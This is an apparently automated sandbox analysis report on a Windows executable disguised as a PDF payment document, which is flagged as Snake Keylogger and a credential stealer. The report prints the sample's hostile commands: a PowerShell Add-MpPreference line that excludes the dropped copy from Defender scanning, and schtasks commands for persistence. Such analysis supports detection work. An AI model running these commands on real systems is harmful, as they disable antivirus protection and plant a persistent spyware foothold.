Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1284942009.00000000030F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCloudServices.exe< vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3710700225.000000000041A000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCloudServices.exe< vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3711387177.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe Binary or memory string: OriginalFilenameIHia.exe0 vs BEPZA MT103 Credit.pdf.exe
Uses 32bit PE files
Source: BEPZA MT103 Credit.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: BEPZA MT103 Credit.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: YEGIgzyAhkvT.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, UltraSpeed.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, COVIDPickers.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, UltraSpeed.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, COVIDPickers.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, U93FXVSN9l2hPxLFaG.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, U93FXVSN9l2hPxLFaG.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, U93FXVSN9l2hPxLFaG.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, lTHTbNiDjeUoU6Vpd8.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, lTHTbNiDjeUoU6Vpd8.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, lTHTbNiDjeUoU6Vpd8.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, lTHTbNiDjeUoU6Vpd8.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, U93FXVSN9l2hPxLFaG.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, U93FXVSN9l2hPxLFaG.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, U93FXVSN9l2hPxLFaG.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@18/11@3/3
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe File created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2076:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe File created: C:\Users\user\AppData\Local\Temp\tmp3E23.tmp Jump to behavior
Source: BEPZA MT103 Credit.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: BEPZA MT103 Credit.pdf.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000000.1262992343.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, YEGIgzyAhkvT.exe.0.dr Binary or memory string: SELECT YEAR(balance_date) AS Year, MONTH(balance_date) AS Month, SUM(profit) AS TotalIncome, SUM(expense) AS TotalExpense FROM Daily_Report GROUP BY YEAR(balance_date), MONTH(balance_date) ORDER BY Year, Month;QA monthly report of profits and expenses%QueryMonthlyReport9SELECT * FROM DATABASE_USERSmINSERT INTO DATABASE_USERS VALUES(@username,@password)[SELECT * FROM DATABASE_USERS WHERE [user_id]=IUPDATE DATABASE_USERS SET password='
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000000.1262992343.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, YEGIgzyAhkvT.exe.0.dr Binary or memory string: SELECT CONVERT(DATE, V.VISIT_TIME) AS Visit_Date, COUNT(V.CLIENT_VISIT_ID) AS Daily_Visits FROM Client_Visits V JOIN Clients C ON V.CLIENT_ID = C.CLIENT_ID GROUP BY CONVERT(DATE, V.VISIT_TIME) ORDER BY Visit_Date;QA monthly and daily report of gym visits
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E8D000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3716690730.0000000003D1D000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E01000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000000.1262992343.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, YEGIgzyAhkvT.exe.0.dr Binary or memory string: SELECT FORMAT(V.VISIT_TIME, 'yyyy-MM') AS Month, COUNT(V.CLIENT_VISIT_ID) AS Total_Visits FROM Client_Visits V JOIN Clients C ON V.CLIENT_ID = C.CLIENT_ID GROUP BY FORMAT(V.VISIT_TIME, 'yyyy-MM') ORDER BY Month;
Source: BEPZA MT103 Credit.pdf.exe Virustotal: Detection: 66%
Source: BEPZA MT103 Credit.pdf.exe ReversingLabs: Detection: 75%
Source: BEPZA MT103 Credit.pdf.exe String found in binary or memory: -Added at (DD-MM-YYYY):
Source: BEPZA MT103 Credit.pdf.exe String found in binary or memory: Log OutIaddUpdateDeleteRowsToolStripMenuItem-Add/Update/Delete rows/clientToolStripMenuItem
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe File read: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe"
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process created: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp4900.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Process created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Process created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe" Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp" Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process created: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp4900.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Process created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Process created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe" Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: winnsi.dll Jump to behavior
